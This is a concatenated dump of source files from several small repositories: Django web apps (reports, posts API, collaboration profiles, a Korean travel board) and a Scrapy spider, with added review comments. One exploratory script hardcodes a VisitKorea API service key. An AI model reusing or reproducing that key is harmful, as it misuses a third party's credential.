"/sharding/tests/test_state_transition.py",
"/sharding/tests/test_validator_manager.py",
"/sharding/tests/test_validator_manager_utils.py"
] |
01kazu/tongue
|
from django.contrib import admin
from .models import Report
class ReportAdmin(admin.ModelAdmin):
    """Admin options for Report: `date` is auto-managed, so show it read-only."""
    readonly_fields = ('date',)

# Register your models here.
admin.site.register(Report, ReportAdmin)
--- FILE SEPARATOR ---
from django.apps import AppConfig
from .models import Report
class ReportsConfig(AppConfig):
    """App configuration for the reports app.

    NOTE(review): the module-level ``from .models import Report`` above is
    unused here; importing models at AppConfig-module import time can raise
    AppRegistryNotReady — consider removing it.
    """
    name = 'reports'
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-11-28 10:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated migration: adds the `date` field to Report."""

    dependencies = [
        ('reports', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='report',
            name='date',
            field=models.DateField(default=django.utils.timezone.now),
            # preserve_default=False: the default above only back-fills
            # existing rows during this migration.
            preserve_default=False,
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-01 07:41
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated migration: renames `context` to `post`, drops `slug`,
    and alters the `date` field.
    """

    dependencies = [
        ('reports', '0002_report_date'),
    ]

    operations = [
        migrations.RenameField(
            model_name='report',
            old_name='context',
            new_name='post',
        ),
        migrations.RemoveField(
            model_name='report',
            name='slug',
        ),
        migrations.AlterField(
            model_name='report',
            name='date',
            # NOTE(review): verbose_name is set to a datetime object — this
            # looks like an autogeneration artifact (likely meant as a
            # default). Left untouched since the migration may already be
            # applied.
            field=models.DateTimeField(verbose_name=datetime.datetime(2019, 12, 1, 7, 41, 13, 304781, tzinfo=utc)),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-01 22:58
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: changes Report.user to a CharField(30)."""

    dependencies = [
        ('reports', '0004_auto_20191201_2204'),
    ]

    operations = [
        migrations.AlterField(
            model_name='report',
            name='user',
            field=models.CharField(max_length=30),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-02 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the optional `title` field to Report."""

    dependencies = [
        ('reports', '0005_auto_20191201_2358'),
    ]

    operations = [
        migrations.AddField(
            model_name='report',
            name='title',
            field=models.CharField(blank=True, max_length=50),
        ),
    ]
--- FILE SEPARATOR ---
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils import timezone
# User = settings.AUTH_USER_MODEL
# Create your models here.
class Report(models.Model):
    """A user-submitted report/post."""
    user = models.CharField(max_length=30)      # author stored as a plain username string, not an FK
    title = models.CharField(max_length=50)
    post = models.TextField()
    date = models.DateTimeField(auto_now=True)  # refreshed on every save

    def get_absolute_url(self):
        """Return the canonical detail-page URL for this report."""
        # Fix: `reverse` was never imported at module level, so calling this
        # method raised NameError. Imported locally to keep the fix
        # self-contained within the class.
        from django.urls import reverse
        return reverse("reports:all_posts_detail", kwargs={'pk': self.pk})
# class Profile(models.Model):
# user = models.OneToOneField(User, on_delete=models.CASCADE)
# matric_number = models.CharField(max_length=17)
# @receiver(post_save, sender=User)
# def create_user_profile(sender, instance, created, **kwargs):
# if created:
# Profile.objects.create(user=instance)
# @receiver(post_save, sender=User)
# def save_user_profile(sender, instance, **kwargs):
# instance.profile.save()
--- FILE SEPARATOR ---
from django.urls import path, include
from . import views
from django.contrib.auth import views as auth_views
from .views import AllPosts, AllPostsDetail
app_name = "reports"

# Routes for the reports app: authentication (login/signup/e-mail
# activation), the report feed, and logout.
urlpatterns = [
    # path('', views.home, name='home'),
    path('', views.login_user, name='login_user'),
    path('activate/<str:uidb64>/<str:token>/', views.activate_account, name='activate'),
    path('accounts/', include('django.contrib.auth.urls')),
    path('sign-up', views.signup, name='register_user'),
    path("welcome", views.welcome, name='welcome'),
    path("activate-email", views.activate_email, name='activate_email'),
    path("all-posts", AllPosts.as_view(), name="all_posts"),
    path('all-posts/<int:pk>', AllPostsDetail.as_view(), name="all_posts_detail"),
    path('logout', views.logout_user, name="logout_user")
]
--- FILE SEPARATOR ---
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import login, authenticate, update_session_auth_hash, logout
from .forms import SignUpForm, ReportForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
from django.contrib.auth.models import User
from django.core.mail import EmailMessage
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, View
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Report
activate_email_info = ""
def home(request):
    """Render the static home page."""
    return render(request, 'home.html')
def index(request):
    """Unimplemented placeholder view (returns None — not routable as-is)."""
    pass
def signup(request):
    """Register a new, inactive user and e-mail an activation link.

    On GET: show an empty signup form. On valid POST: create the user as
    inactive, send the activation e-mail, and show the confirmation page.
    On invalid POST: re-render the bound form with errors.
    """
    # Fix: this was previously assigned as a function local, so the module
    # global read by activate_email() was never updated.
    global activate_email_info
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            user.is_active = False  # stays inactive until the e-mail link is clicked
            user.save()
            current_site = get_current_site(request)
            mail_subject = 'Activate your account.'
            message = render_to_string('reports/html/activate_account.html', {
                'user': user,
                'domain': current_site.domain,
                'uid': urlsafe_base64_encode(force_bytes(user.pk)),
                'token': account_activation_token.make_token(user),
            })
            to_email = form.cleaned_data.get('email')
            email = EmailMessage(
                mail_subject, message, to=[to_email]
            )
            email.send()
            activate_email_info = 'We have sent you an email, please confirm your email address to complete registration'
            return render(request, 'reports/html/confirm_email.html', {"active": activate_email_info})
    else:
        form = SignUpForm()
    return render(request, 'reports/html/signup.html', {'form': form})
def activate_email(request):
    """Show the confirmation page with the module-level activate_email_info message."""
    return render(request, 'reports/html/confirm_email.html', {"active": activate_email_info})
#activate account
def activate_account(request, uidb64, token, backend='django.contrib.auth.backends.ModelBackend'):
    """Confirm an e-mail activation link.

    Decodes the base64 uid, validates the token, then activates and logs the
    user in. Any decode/lookup failure falls through to the invalid-link page.

    Fix: removed debug print() calls that wrote the uid and the activation
    token to stdout (leaking a single-use credential into logs), and a
    redundant token check inside the try block.
    """
    try:
        uid = urlsafe_base64_decode(uidb64).decode()
        user = User.objects.get(pk=uid)
    except (TypeError, ValueError, OverflowError, User.DoesNotExist):
        user = None
    if user is not None and account_activation_token.check_token(user, token):
        user.is_active = True
        user.save()
        login(request, user, backend='django.contrib.auth.backends.ModelBackend')
        activate_success = 'Your account has been activated successfully'
        return render(request, 'reports/html/confirm_email.html', {"active": activate_success})
    else:
        activate_failure = 'Activation link is invalid!'
        return render(request, 'reports/html/confirm_email.html', {"active": activate_failure})
def password_reset(request):
    """Render the password-reset form page."""
    return render(request, 'reports/html/registration/password_reset_form.html')
def login_user(request):
    """Render the login page; on POST, authenticate and redirect to welcome.

    Fix: authentication is only attempted on POST. Previously a plain GET
    called authenticate(None, None) and always rendered the "do not match"
    error on first visit. Debug print() calls dumping the request were also
    removed.
    """
    error = ""
    if request.method == "POST":
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = authenticate(username=username, password=password)
        if user:
            if user.is_active:
                login(request, user)
                return HttpResponseRedirect(reverse("reports:welcome"))
            else:
                # account exists but is deactivated (e.g. e-mail not confirmed)
                return render(request, "registration/login.html")
        else:
            error = "Username and Password do not match. Try again"
    return render(request, "reports/html/login.html", { "error" : error } )
@login_required
def welcome(request):
    """Show the report form; on valid POST, save the report for the current user.

    Fix: removed an ineffective pre-validation assignment (setting an
    attribute on the *form* object before is_valid() had no effect on the
    saved model) and debug print() calls.
    """
    if request.method == "POST":
        form = ReportForm(request.POST)
        if form.is_valid():
            report = form.save(commit=False)
            report.user = request.user.username  # stamp the author server-side
            report.save()
            return redirect("reports:all_posts")
    else:
        form = ReportForm()
    return render(request, "reports/html/welcome.html", {"form": form})
@login_required
def logout_user(request):
    """Log the user out and send them back to the login page."""
    logout(request)
    return HttpResponseRedirect(reverse("reports:login_user"))
# @login_required
class AllPosts(LoginRequiredMixin, ListView):
    """Paginated feed of reports, newest first. Requires login.

    Fix: LoginRequiredMixin must come *before* the view class in the bases,
    otherwise its dispatch() is never reached (View.dispatch does not call
    super()) and the page was served to anonymous users.
    """
    model = Report
    context_object_name = 'post_list'
    template_name = "reports/html/all_posts.html"
    ordering = ['-date']
    paginate_by = 10
    login_url = ''
class AllPostsDetail(LoginRequiredMixin, View):
    """Detail page for a single report. Requires login.

    Fix: LoginRequiredMixin reordered before View so its dispatch() actually
    runs (same MRO bug as AllPosts).
    """
    login_url = ''

    def get(self, request, pk):
        # NOTE(review): Report.objects.get raises DoesNotExist (HTTP 500) for
        # an unknown pk — consider get_object_or_404.
        post_detail = Report.objects.get(pk=pk)
        return render(request, 'reports/html/all_posts_detail.html', {'post_detail': post_detail})
|
[
"/reports/admin.py",
"/reports/apps.py",
"/reports/migrations/0002_report_date.py",
"/reports/migrations/0003_auto_20191201_0841.py",
"/reports/migrations/0005_auto_20191201_2358.py",
"/reports/migrations/0006_report_title.py",
"/reports/models.py",
"/reports/urls.py",
"/reports/views.py"
] |
01kingmaker01/vrepo-backend-django
|
import firebase_admin
from firebase_admin import credentials
from firebase_admin import auth
cred = credentials.Certificate(r'D:\project\___VIT___\vit\api\firebase\key.json')
firebase_admin.initialize_app(cred)
def simple_middleware(get_response):
    """Middleware factory: currently a pure pass-through.

    The disabled code below verified a Firebase ID token taken from the
    Authorization header; re-enable it to enforce authentication:
        token = request.headers['Authorization']
        decoded_token = auth.verify_id_token(token)
    """
    def middleware(request):
        return get_response(request)

    return middleware
--- FILE SEPARATOR ---
from rest_framework.pagination import CursorPagination
from rest_framework.response import Response
class PostCursorPagination(CursorPagination):
    """Cursor pagination for posts: 5 per page, highest id first, cursor in ?c=."""
    page_size = 5
    cursor_query_param = 'c'
    ordering = '-id'
--- FILE SEPARATOR ---
from django.db.models import fields
from django.db.models.base import Model
from rest_framework import serializers
from .models import Post
class PostsSerializer(serializers.ModelSerializer):
    """Model serializer exposing every field of Post."""
    class Meta:
        model = Post
        fields = '__all__'
--- FILE SEPARATOR ---
from django.urls import path, include
from .import views
from django.conf.urls.static import static
from django.conf import settings
# API routes: list/create posts, retrieve one, and update/delete by id.
urlpatterns = [
    path('posts/', views.PostCreate.as_view()),
    path('posts/<int:id>', views.PostView.as_view()),
    path('update/<int:id>', views.PostUpdateDelete.as_view()),
]
--- FILE SEPARATOR ---
from .serializers import *
from django.shortcuts import redirect, render
from . models import Post
#import rest framwork components
from rest_framework import serializers
from rest_framework.generics import ListCreateAPIView,RetrieveAPIView, DestroyAPIView, RetrieveUpdateDestroyAPIView
from . paginations import PostCursorPagination
# Create your views here.
# @api_view(['GET', 'POST'])
# def hello_world(request):
# if request.method == 'POST':
# return Response({"message": "Got some data!", "data": request.data})
# return Response({"message": "Hello, world!"})
class PostCreate(ListCreateAPIView):
    """GET: cursor-paginated list of posts; POST: create a post."""
    queryset = Post.objects.all()
    serializer_class = PostsSerializer
    pagination_class = PostCursorPagination
class PostView(RetrieveAPIView):
    """GET: retrieve one post by its ``id`` URL kwarg."""
    queryset = Post.objects.all()
    serializer_class = PostsSerializer
    lookup_field = 'id'
    # NOTE(review): pagination has no effect on a single-object retrieve
    # view — presumably copied from PostCreate; harmless.
    pagination_class = PostCursorPagination
class PostUpdateDelete(RetrieveUpdateDestroyAPIView):
    """GET/PUT/PATCH/DELETE for a single post addressed by ``id``."""
    queryset = Post.objects.all()
    serializer_class = PostsSerializer
    lookup_field = 'id'
    # NOTE(review): pagination is unused on single-object views.
    pagination_class = PostCursorPagination
|
[
"/api/firebase/middleware.py",
"/api/paginations.py",
"/api/serializers.py",
"/api/urls.py",
"/api/views.py"
] |
01mokuba/soumu_scrapy
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ArchiveItem(scrapy.Item):
    """One monthly press-release archive page: its month code and links."""
    links = scrapy.Field()   # list of {'href', 'text'} dicts
    month = scrapy.Field()   # month code string, e.g. '1809'
class ClipItem(scrapy.Item):
    """One press-release detail page, including PDF attachment URLs."""
    src = scrapy.Field()          # raw <body> HTML
    text = scrapy.Field()         # main content area HTML
    attachments = scrapy.Field()  # list of {'href', 'text'} for PDF links
    file_urls = scrapy.Field()    # URLs consumed by scrapy's FilesPipeline
    files = scrapy.Field()        # populated by FilesPipeline after download
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
import re

from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor

from soumu_scrapy.items import ArchiveItem, ClipItem
class ArchiveSpider(CrawlSpider):
    """Spider for the MIC (soumu.go.jp) press-release archive.

    Follows monthly archive-list pages and individual release pages found
    inside the "contentsBody" area, yielding ArchiveItem (monthly link
    lists) and ClipItem (page body plus PDF attachment URLs).

    Fixes: the regex patterns are now raw strings — ``\\d`` / ``\\.`` in
    plain string literals are invalid escape sequences (DeprecationWarning,
    a future SyntaxError); ``re`` is imported at module level (it was used
    in parse_archive_detail without any import, a NameError at runtime).
    """
    name = 'archive'
    allowed_domains = ['www.soumu.go.jp']  # restrict the crawl to this domain
    start_urls = ['http://www.soumu.go.jp/menu_news/s-news/index.html']  # crawl entry point
    custom_settings = {
        'DOWNLOAD_DELAY' : 1,  # politeness delay: 1 second between requests
    }
    rules = (
        Rule(
            LinkExtractor(
                allow=[r'http://www.soumu.go.jp/menu_news/s-news/[\d]+m\.html'],  # monthly press-release list pages
                restrict_xpaths=['//div[@class=\'contentsBody\']']  # only follow links inside the main content area
            ),
            callback='parse_archive_list',  # handle each monthly list page
            follow=True
        ),
        Rule(
            LinkExtractor(
                allow=[r'http://www.soumu.go.jp/menu_news/s-news/[\d\w]+\.html'],  # individual press-release pages
                restrict_xpaths=['//div[@class=\'contentsBody\']']  # only follow links inside the main content area
            ),
            callback='parse_archive_detail',  # handle each detail page
            follow=True
        )
    )

    def parse_archive_list(self, response):
        """Collect every content-area link of a monthly page into one ArchiveItem."""
        item = ArchiveItem()
        item['links'] = []
        item['month'] = response.url.split('/')[-1].replace('m.html','')  # extracted month code, e.g. '1809'
        for linkitem in response.xpath('//div[@class=\"contentsBody\"]//a'):  # every anchor in the main content
            item['links'].append({
                'href' : linkitem.xpath('@href').extract_first(),  # link URL
                'text' : linkitem.xpath('text()').extract_first()  # anchor text
            })
        return item

    def parse_archive_detail(self, response):
        """Build a ClipItem from one press-release page, gathering PDF links."""
        item = ClipItem()
        item['src'] = response.xpath('//body').extract_first()
        content_root = response.xpath('//div[@class=\'contentsBody\']')
        item['text'] = content_root.extract_first()
        item['attachments'] = []
        item['file_urls'] = []
        for d in response.xpath('//a'):  # loop over every anchor on the page
            dd = d.xpath('@href').extract_first()  # href value
            if dd is not None:
                if re.match(r'^https?://', dd) is None:  # relative link -> make absolute
                    dd = response.urljoin(dd)
                if re.match(r'.*\.[Pp][Dd][Ff]$', dd) is not None:  # keep only .pdf links (case-insensitive)
                    item['attachments'].append({
                        'href': dd,
                        'text': d.xpath('text()').extract_first()
                    })
                    item['file_urls'].append(dd)
        return item
|
[
"/soumu_scrapy/items.py",
"/soumu_scrapy/spiders/archive.py"
] |
01shobitha/collabmate
|
from django.contrib import admin
from .models import Language, Profile, LanguageUser, Project
# Register your models here.
# Expose the collaboration models in the Django admin site.
admin.site.register(Language)
admin.site.register(Project)
admin.site.register(LanguageUser)
admin.site.register(Profile)
--- FILE SEPARATOR ---
# Generated by Django 3.0 on 2020-12-01 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (collab 0002): creates the Project table.

    Generated by Django 3.0 — do not edit by hand.
    """
    dependencies = [
        ('collab', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('proj_name', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, max_length=700)),
                ('git_hub_link', models.TextField(blank=True, max_length=1000)),
                ('proj_link', models.TextField(blank=True, max_length=1000)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
#language
class Language(models.Model):
    """A language a user can know; listed alphabetically by name."""
    # language display name
    lang_name = models.CharField(max_length=100)
    class Meta:
        ordering = ['lang_name']
#languageUser
class LanguageUser(models.Model):
    """Many-to-many join between users and the languages they know."""
    # NOTE(review): 'land_id' looks like a typo for 'lang_id'; renaming
    # would require a schema migration, so it is left unchanged here.
    land_id = models.ForeignKey(Language, on_delete=models.CASCADE)
    user_id = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        return f'{self.pk}'
#Project
class Project(models.Model):
    """A project with optional description and GitHub / live links."""
    proj_name = models.CharField(max_length=100)
    description = models.TextField(max_length = 700, blank = True)
    git_hub_link = models.TextField(max_length = 1000, blank = True)
    proj_link = models.TextField(max_length = 1000, blank = True)
#Profile
class Profile(models.Model):
    """One-to-one profile extension of the auth User."""
    user = models.OneToOneField(User,on_delete=models.CASCADE)
    # free-form biography text
    bio = models.TextField(max_length = 500, blank = True)
    # NOTE(review): this field name shadows the Language class inside the
    # class body; renaming would need a migration, so it is left as-is.
    Language = models.ForeignKey(Language, on_delete=models.CASCADE)
    def __str__(self):
        return f'{self.pk}'
--- FILE SEPARATOR ---
from django.urls import path
from . import views
# Routes: home page (with people search) and per-user detail pages.
urlpatterns = [
    path('', views.index, name='index'),
    path('details/<slug:username>/',views.details,name= 'details'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
def index(request):
    """Home page: greets the visitor and echoes the people-search query."""
    searched_item = request.GET.get('search_people')
    # (A "no results found" fallback used to live here; left disabled.)
    print(searched_item)
    context = {
        'greeting': "Hai! page is working",
        'username': request.user.username,
        'searched_item': searched_item,
    }
    return render(request, 'index.html', context=context)
def details(request, username):
    """Render a user's detail page.

    Authenticated visitors get a greeting; anonymous visitors are asked
    to log in before viewing the page.
    """
    if request.user.is_authenticated:
        message = f'Hai, this is {username}'
    else:
        message = f"Login to view {username}'s page"
    context = {
        'name': request.user.username,
        'message': message,
        'username': username,
    }
    return render(request, 'details.html', context=context)
|
[
"/collab/admin.py",
"/collab/migrations/0002_project.py",
"/collab/models.py",
"/collab/urls.py",
"/collab/views.py"
] |
01stone/GetawayTeam
|
from django.contrib import admin
from getaway import models
# Manage comments from the Django admin.
class CommentAdmin(admin.ModelAdmin):
    """Admin configuration for Comment: list columns and search fields."""
    list_display = (
        'c_board',
        'c_content',
        'c_user',
        'c_pubdate',
        'c_like',
    )
    # searchable by board title, comment body, and author id
    search_fields = ('c_board__title', 'c_content', 'c_user__user_id',)
# Register the getaway models; Comment uses the customized CommentAdmin.
admin.site.register(models.Board)
admin.site.register(models.Tour)
admin.site.register(models.TourComment)
admin.site.register(models.Comment, CommentAdmin)
--- FILE SEPARATOR ---
import requests
from bs4 import BeautifulSoup
# Korean administrative-area lookup tables for the VisitKorea tour API:
# whole_area maps region name -> API areaCode; the *_area lists hold the
# sub-districts (gu/gun/si) of each region.
whole_area = {'서울': '1', '인천': '2', '대전': '3', '대구': '4', '광주': '5', '부산': '6', '울산': '7', '세종': '8', '경기': '31', '강원': '32', '충북': '33', '충남': '34', '경북': '35', '경남': '36', '전북': '37', '전남': '38', '제주': '39'}
Seoul_area = ['강남구', '강동구', '강북구', '강서구', '관악구', '광진구', '구로구', '금천구', '노원구', '도봉구', '동대문구', '동작구', '마포구', '서대문구', '서초구', '성동구', '성북구', '송파구', '양천구', '영등포구', '용산구', '은평구', '종로구', '중구', '중랑구']
Incheon_area = ['강화군', '계양구', '미추홀구', '남동구', '동구', '부평구', '서구', '연수구', '옹진군', '중구']
Daejeon_area = ['대덕구', '동구', '서구', '유성구', '중구']
Daegu_area = ['남구', '달서구', '달성군', '동구', '북구', '서구', '수성구', '중구']
Gwangju_area = ['광산구', '남구', '동구', '북구', '서구']
Busan_area = ['강서구', '금정구', '기장군', '남구', '동구', '동래구', '부산진구', '북구', '사상구', '사하구', '서구', '수영구', '연제구', '영도구', '중구', '해운대구']
Ulsan_area = ['중구', '남구', '동구', '북구', '울주군']
Sejong_area = ['세종특별자치시']
Gyeonggi_area = ['가평군', '고양시', '과천시', '광명시', '광주시', '구리시', '군포시', '김포시', '남양주시', '동두천시', '부천시', '성남시', '수원시', '시흥시', '안산시', '안성시', '안양시', '양주시', '양평군', '여주시', '연천군', '오산시', '용인시', '의왕시', '의정부시', '이천시', '파주시', '평택시', '포천시', '하남시']
Gangwon_area = ['강릉시', '고성군', '동해시', '삼척시', '속초시', '양구군', '양양군', '영월군', '원주시', '인제군', '정선군', '철원군', '춘천시', '태백시', '평창군', '홍천군', '화천군', '횡성군']
Chungbuk_area = ['괴산군', '단양군', '보은군', '영동군', '옥천군', '음성군', '제천시', '진천군', '청원군', '청주시', '충주시', '증평군']
Chungnam_area = ['공주시', '금산군', '논산시', '당진시', '보령시', '부여군', '서산시', '서천군', '아산시', '예산군', '천안시', '청양군', '태안군', '홍성군', '계룡시']
Gyeongbuk_area = ['경산시', '경주시', '고령군', '구미시', '군위군', '김천시', '문경시', '봉화군', '상주시', '성주군', '안동시', '영덕군', '영양군', '영주시', '영천시', '예천군', '울릉군', '울진군', '의성군', '청도군', '청송군', '칠곡군', '포항시']
Gyeongnam_area = ['거제시', '거창군', '고성군', '김해시', '남해군', '마산시', '밀양시', '사천시', '산청군', '양산시', '의령군', '진주시', '진해시', '창녕군', '창원시', '통영시', '하동군', '함안군', '함양군', '합천군']
Jeonbuk_area = ['고창군', '군산시', '김제시', '남원시', '무주군', '부안군', '순창군', '완주군', '익산시', '임실군', '장수군', '전주시', '정읍시', '진안군']
Jeonnam_area = ['강진군', '고흥군', '곡성군', '광양시', '구례군', '나주시', '담양군', '목포시', '무안군', '보성군', '순천시', '신안군', '여수시', '영광군', '영암군', '완도군', '장성군', '장흥군', '진도군', '함평군', '해남군', '화순군']
Jeju_area = ['남제주군', '북제주군', '서귀포시', '제주시']
# Exploratory script: query the VisitKorea open API for area codes and an
# area-based tour listing, then dump the parsed XML to stdout.
# SECURITY NOTE(review): the ServiceKey below is a credential committed to
# source — it should be moved to an environment variable and rotated.
url = 'http://api.visitkorea.or.kr/openapi/service/rest/KorService/areaCode'
queryParams = '?' + 'ServiceKey=' + 'lA29%2FannvhdQHnNE4mon7ZoyNq0ue6P%2FPnYQuFsfaZ7D8YedR6DOISotomyacj0u15iLaCeruqZUsGe%2F79DpRA%3D%3D' \
              + '&MobileOS=' + 'ETC' \
              + '&MobileApp=' + 'AppTest' \
              + '&areaCode=' + '35'\
              + '&numOfRows=' + '32'
url = url + queryParams
result = requests.get(url)
# The API returns XML; html.parser tolerates it for quick inspection.
bs_obj = BeautifulSoup(result.content, "html.parser")
print(bs_obj)
url2 = 'http://api.visitkorea.or.kr/openapi/service/rest/KorService/areaBasedList'
queryParams2 = '?' + 'ServiceKey=' + 'lA29%2FannvhdQHnNE4mon7ZoyNq0ue6P%2FPnYQuFsfaZ7D8YedR6DOISotomyacj0u15iLaCeruqZUsGe%2F79DpRA%3D%3D' \
               + '&MobileOS=' + 'ETC' \
               + '&MobileApp=' + 'AppTest' \
               + '&areaCode=' + '1'
url2 = url2 + queryParams2
result2 = requests.get(url2)
bs_obj2 = BeautifulSoup(result2.content, "html.parser")
print(bs_obj2)
print(bs_obj2.find("addr1"))
# Collect all <name> values (sub-area names) from the first response.
area = list()
for data in bs_obj.find_all("name"):
    area.append(data.text)
print(area)
--- FILE SEPARATOR ---
from django import forms
from .models import *
class BoardForm(forms.ModelForm):
    """Form for creating/editing a Board post.

    b_user is intentionally excluded: the author is filled in from the
    logged-in session user by the view, not from user input.
    """
    class Meta:
        model = Board
        fields = ['b_title', 'b_content']  # only the fields shown on the create page
# Comment handling via a ModelForm.
class CommentForm(forms.ModelForm):
    """Form for posting a comment (author and body; board is set by the view)."""
    class Meta:
        model = Comment
        fields = ['c_user', 'c_content']
        # labels = {
        #     'content': 'Comment body',
        # }
--- FILE SEPARATOR ---
# Generated by Django 2.2.5 on 2021-08-13 02:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the getaway app.

    Creates the Board, Tour, TourComment and Comment tables.  Generated
    by Django 2.2.5 — do not edit by hand.
    """
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Board',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('b_title', models.CharField(max_length=100)),
                ('b_content', models.TextField(max_length=3000)),
                ('b_like', models.IntegerField(default=0)),
                ('b_comment', models.IntegerField(default=0)),
                ('b_pubdate', models.DateTimeField(auto_now=True)),
                ('b_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='user_board', to=settings.AUTH_USER_MODEL)),
                ('b_voter', models.ManyToManyField(blank=True, related_name='voter_board', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Tour',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('t_name', models.CharField(max_length=50)),
                ('t_like', models.IntegerField(default=0)),
                ('t_dis', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='TourComment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tc_userID', models.CharField(max_length=20)),
                ('tc_content', models.TextField(max_length=1000)),
                ('tc_pubdate', models.DateTimeField(auto_now=True)),
                ('tc_tour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='getaway.Tour')),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('c_content', models.TextField(max_length=1000)),
                ('c_like', models.IntegerField(default=0)),
                ('c_pubdate', models.DateTimeField(auto_now=True)),
                ('c_board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='getaway.Board')),
                ('c_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
from django.contrib.auth.models import User
from django.db import models
class Board(models.Model):
    """A forum post with a denormalized comment counter and a voter set."""
    b_title = models.CharField(max_length=100)        # post title
    b_content = models.TextField(max_length=3000)     # post body
    b_like = models.IntegerField(default=0)           # like count (legacy counter)
    b_comment = models.IntegerField(default=0)        # number of comments (kept in sync by views)
    b_pubdate = models.DateTimeField(auto_now=True)   # last-modified timestamp
    b_user = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, related_name='user_board')  # author
    # voters as M2M so a user cannot like the same post twice
    b_voter = models.ManyToManyField(User, related_name='voter_board', blank=True)
    def like_count(self):
        """Total number of users who liked this post."""
        return self.b_voter.count()
    def __str__(self):
        return self.b_title
class Comment(models.Model):
    """A comment attached to a Board post."""
    c_content = models.TextField(max_length=1000)                 # comment body
    c_user = models.ForeignKey(User, on_delete=models.CASCADE)    # comment author
    c_like = models.IntegerField(default=0)                       # comment like count
    c_pubdate = models.DateTimeField(auto_now=True)               # last-modified timestamp
    c_board = models.ForeignKey(Board, on_delete=models.CASCADE)  # the post this comment belongs to
    def __str__(self):
        return self.c_content
class Tour(models.Model):
    """Like/dislike counters for a tour spot, keyed by its API contentId."""
    t_name = models.CharField(max_length=50)   # tour-API contentId stored as text
    t_like = models.IntegerField(default=0)    # like count
    t_dis = models.IntegerField(default=0)     # dislike count
    def __str__(self):
        return self.t_name
class TourComment(models.Model):
    """A comment on a tour spot (author stored as a plain string id)."""
    tc_userID = models.CharField(max_length=20)               # commenter's id as text
    tc_content = models.TextField(max_length=1000)            # comment body
    tc_pubdate = models.DateTimeField(auto_now=True)          # last-modified timestamp
    tc_tour = models.ForeignKey(Tour, on_delete=models.CASCADE)  # the tour commented on
    def __str__(self):
        return self.tc_content
# 이름을 임시로 DefUser 로 바꿈. 장고 고유 User 랑 겹치길래...
# class DefUser(models.Model):
# user_name = models.CharField(max_length=20)
# user_password = models.CharField(max_length=20)
# user_email = models.EmailField(max_length=40)
# user_phone = models.IntegerField()
# user_created = models.DateTimeField(auto_now=True)
#
# def __str__(self):
# return self.user_name
--- FILE SEPARATOR ---
from django.urls import path
from . import views
app_name = 'getaway'  # URL namespace for {% url 'getaway:...' %} lookups
urlpatterns = [
    # http://localhost:8000
    path('', views.home, name='home'),
    path('<int:contentId>/', views.tour_detail, name='detail'),
    # http://localhost:8000/list
    path('list/', views.b_list, name='b_list'),
    # http://localhost:8000/list/create
    path('list/create/', views.b_create, name='b_create'),
    path('detail/<int:board_id>/', views.b_detail, name='b_detail'),
    path('modify/<int:board_id>/', views.b_modify, name='b_modify'),
    path('detail/remove/<int:board_id>/', views.b_remove, name='b_remove'),
    # post like/recommend toggle
    path('detail/<int:board_id>/like/', views.b_like, name='b_like'),
    # sign-up / login / logout
    path('signup/', views.signup, name='signup'),
    path('login/', views.login, name='login'),
    path('logout/', views.logout, name='logout'),
    # comments are handled via AJAX inside b_detail
]
